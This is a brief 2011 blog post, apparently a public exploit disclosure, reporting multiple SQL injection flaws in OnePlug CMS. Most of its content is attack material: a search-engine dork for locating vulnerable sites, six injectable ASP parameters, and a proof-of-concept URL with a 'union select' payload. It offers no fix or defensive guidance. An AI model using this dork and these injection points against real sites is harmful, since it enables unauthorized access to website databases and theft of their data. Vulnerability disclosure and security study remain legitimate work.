Wednesday, March 16, 2011

OnePlug CMS Vulnerable to Multiple SQL Injection


Title : OnePlug CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.webpromo-inc.com/
Found by : p0pc0rn
Dork : intext:"Powered by OnePlug CMS"


SQL - Microsoft Access
-------------------------------
Parameters
index.asp?Team_ID=[SQL]
service_info.asp?Service_ID=[SQL]
product_details.asp?Product_ID=[SQL]
product_list.asp?Category_ID=[SQL]
product_info.asp?Product_ID=[SQL]
category_list.asp?Category_ID=[SQL]

more..

POC
---
http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a



thanks,
-p0pc0rn-
Share:

0 comments: